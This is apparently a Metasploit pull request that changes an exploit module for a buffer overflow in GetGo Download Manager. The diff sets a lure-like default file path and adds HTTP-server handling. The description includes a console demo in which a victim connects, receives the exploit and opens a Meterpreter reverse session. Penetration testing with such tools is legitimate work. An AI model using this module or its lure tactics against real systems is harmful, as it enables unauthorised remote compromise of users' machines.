### PR TITLE
Support Configurable resource for getgodm_http_response_bof

### DIFF
--- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb
+++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
@@ -37,7 +37,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'ExitFunction' => 'process'
+          'ExitFunction' => 'process',
+          'URIPATH' => "/shakeitoff.mp3"
         },
       'Platform'       => 'win',
       'Payload'        =>
@@ -58,6 +59,89 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => 'Mar 09 2014',
       'DefaultTarget'  => 0))
   end
+
+  #
+  # Handle the HTTP request and return a response.  Code borrorwed from:
+  # msf/core/exploit/http/server.rb
+  #
+  def start_http(opts={})
+    # Ensture all dependencies are present before initializing HTTP
+    use_zlib
+
+    comm = datastore['ListenerComm']
+    if (comm.to_s == "local")
+      comm = ::Rex::Socket::Comm::Local
+    else
+      comm = nil
+    end
+
+    # Default the server host / port
+    opts = {
+      'ServerHost' => datastore['SRVHOST'],
+      'ServerPort' => datastore['HTTPPORT'],
+      'Comm'       => comm
+    }.update(opts)
+
+    # Start a new HTTP server
+    @http_service = Rex::ServiceManager.start(
+      Rex::Proto::Http::Server,
+      opts['ServerPort'].to_i,
+      opts['ServerHost'],
+      datastore['SSL'],
+      {
+        'Msf'        => framework,
+        'MsfExploit' => self,
+      },
+      opts['Comm'],
+      datastore['SSLCert']
+    )
+
+    @http_service.server_name = datastore['HTTP::server_name']
+
+    # Default the procedure of the URI to on_request_uri if one isn't
+    # provided.
+    uopts = {
+      'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+      'Path' => resource_uri
+    }.update(opts['Uri'] || {})
+
+    proto = (datastore["SSL"] ? "https" : "http")
+    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+
+    if (opts['ServerHost'] == '0.0.0.0')
+      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
+    end
+
+    # Add path to resource
+    @service_path = uopts['Path']
+    @http_service.add_resource(uopts['Path'], uopts)
+
+    # As long as we have the http_service object, we will keep the ftp server alive
+    while @http_service
+      select(nil, nil, nil, 1)
+    end
+  end
+
+
+  #
+  # Kill HTTP/FTP (shut them down and clear resources)
+  #
+  def cleanup
+    super
+    stop_service
+
+    begin
+      @http_service.remove_resource(datastore['URIPATH'])
+      @http_service.deref
+      @http_service.stop
+      @http_service.close
+      @http_service = nil
+    rescue
+    end
+  end
+
 
   def on_request_uri(cli, request)
 


### PR DESCRIPTION
All this does is adding a file as the default resource, not a random string.

Demo:
```
$ ./msfconsole -q
msf > use exploit/windows/browser/getgodm_http_response_bof 
msf exploit(getgodm_http_response_bof) > set URIPATH /the_interview.mp4
URIPATH => /the_interview.mp4
msf exploit(getgodm_http_response_bof) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
msf exploit(getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/the_interview.mp4
[*]  Local IP: http://192.168.1.64:8080/the_interview.mp4
[*] Server started.
[*] 192.168.1.80     getgodm_http_response_bof - Client connected...
[*] 192.168.1.80     getgodm_http_response_bof - Sending 6115 bytes to port 2918...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:2919) at 2015-01-15 10:37:02 -0600

msf exploit(getgodm_http_response_bof) >
```